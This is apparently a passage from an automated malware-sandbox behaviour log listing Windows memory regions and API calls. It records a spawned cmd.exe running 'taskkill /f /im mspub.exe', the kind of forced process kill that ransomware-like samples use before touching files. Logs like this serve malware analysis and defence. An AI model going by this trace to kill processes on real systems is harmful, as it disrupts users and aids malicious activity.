"\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4590 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4591 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 4592 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 4593 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 4594 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 4595 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 4596 start_va = 0x4480000 end_va = 0x455ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 4597 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4598 start_va = 0x4550000 end_va = 0x455ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 4599 start_va = 0x4780000 end_va = 0x4907fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004780000" filename = "" Region: id = 4600 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4601 start_va = 0x4910000 end_va = 0x4a90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004910000" filename = "" Region: id = 4602 start_va = 0x4aa0000 end_va = 0x5e9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004aa0000" filename = "" Region: id = 4603 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4604 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 4605 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 4606 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 4607 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 4608 start_va = 0x5ea0000 end_va = 0x61d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4609 start_va = 0x61e0000 end_va = 0x62c9fff monitored = 0 entry_point = 0x621d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4610 start_va = 0x44b0000 end_va = 0x44b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 4611 start_va = 0x45a0000 end_va = 0x467ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 4612 start_va = 0x4680000 end_va = 0x477ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 4613 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4614 start_va = 0x44c0000 end_va = 0x44c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044c0000" filename = "" Region: id = 4615 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4616 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 4617 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 4618 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 4619 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4620 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 4621 start_va = 0x44e0000 end_va = 0x451ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 4622 start_va = 0x61e0000 end_va = 0x621ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061e0000" filename = "" Region: id = 4623 start_va = 0x6220000 end_va = 0x625ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006220000" filename = "" Region: id = 4624 start_va = 0x6260000 end_va = 0x629ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006260000" filename = "" Region: id = 4625 start_va = 0x62a0000 end_va = 0x62dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062a0000" filename = "" Region: id = 4626 start_va = 0x62e0000 end_va = 0x631ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062e0000" filename = "" Region: id = 4627 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 4628 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 4629 start_va = 0x4520000 end_va = 0x4525fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004520000" filename = "" Thread: id = 334 os_tid = 0x6dc Thread: id = 335 os_tid = 0xbfc Thread: id = 336 os_tid = 0x864 Thread: id = 337 os_tid = 0x5e0 Thread: id = 338 os_tid = 0x13b8 Process: id = "63" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x30a42000" os_pid = "0x344" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im mspub.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4632 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4633 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4634 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4635 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4636 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4637 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4638 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4639 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4640 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4641 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4642 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 4643 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4644 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4645 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4646 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4647 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 4648 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4649 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 4650 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4651 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4652 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4653 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4654 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4655 start_va = 0x470000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4656 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4657 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4658 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4659 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4660 start_va = 0x590000 end_va = 0x64dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4661 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4662 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4663 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 4664 start_va = 0x750000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 4665 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4666 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4667 start_va = 0x7d0000 end_va = 0xb06fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 339 os_tid = 0x11b8 [0210.145] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0210.145] __set_app_type (_Type=0x1) [0210.145] __p__fmode () returned 0x74974d6c [0210.145] __p__commode () returned 0x74975b1c [0210.145] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0210.145] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0210.146] GetCurrentThreadId () returned 0x11b8 [0210.146] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x11b8) returned 0x78 [0210.146] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0210.146] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0210.146] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.151] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0210.151] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0210.151] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0210.151] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0210.151] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0210.151] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0210.151] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0210.152] GetConsoleOutputCP () returned 0x1b5 [0210.153] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0210.153] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0210.153] _get_osfhandle (_FileHandle=1) returned 0x140 [0210.153] SetConsoleMode (hConsoleHandle=0x140, dwMode=0x0) returned 0 [0210.153] _get_osfhandle (_FileHandle=1) returned 0x140 [0210.153] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0210.153] _get_osfhandle (_FileHandle=0) returned 0x13c [0210.153] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0210.154] GetEnvironmentStringsW () returned 0x497fd0* [0210.154] GetProcessHeap () returned 0x490000 [0210.154] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa1a) returned 0x4989f8 [0210.154] FreeEnvironmentStringsA (penv="A") returned 1 [0210.154] GetProcessHeap () returned 0x490000 [0210.154] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4) returned 0x497e58 [0210.154] GetEnvironmentStringsW () returned 0x497fd0* [0210.154] GetProcessHeap () returned 0x490000 [0210.154] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa1a) returned 0x499420 [0210.154] FreeEnvironmentStringsA (penv="A") returned 1 [0210.154] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0210.154] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0210.154] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0210.155] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0210.155] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0210.155] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0210.155] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0210.155] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0210.155] RegCloseKey (hKey=0x88) returned 0x0 [0210.155] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0210.155] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0210.155] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0210.155] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0210.155] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0210.155] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0210.155] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0210.155] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0210.155] RegCloseKey (hKey=0x88) returned 0x0 [0210.155] time (in: timer=0x0 | out: timer=0x0) returned 0x62344240 [0210.155] srand (_Seed=0x62344240) [0210.156] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im mspub.exe \"" [0210.156] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im mspub.exe \"" [0210.156] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0210.156] GetProcessHeap () returned 0x490000 [0210.156] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x210) returned 0x496f88 [0210.156] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x496f90, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0210.156] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0210.156] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0210.156] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0210.156] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0210.156] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0210.156] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0210.156] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0210.156] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0210.156] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0210.156] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0210.156] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0210.157] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0210.157] GetProcessHeap () returned 0x490000 [0210.157] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4989f8) returned 1 [0210.157] GetEnvironmentStringsW () returned 0x497fd0* [0210.157] GetProcessHeap () returned 0x490000 [0210.157] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa32) returned 0x49a888 [0210.158] FreeEnvironmentStringsA (penv="A") returned 1 [0210.158] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0210.158] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0210.158] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0210.158] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0210.158] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0210.158] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0210.158] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0210.158] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0210.158] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0210.158] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0210.158] GetProcessHeap () returned 0x490000 [0210.158] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x44) returned 0x4971a0 [0210.158] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0210.158] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0210.158] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0210.159] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: 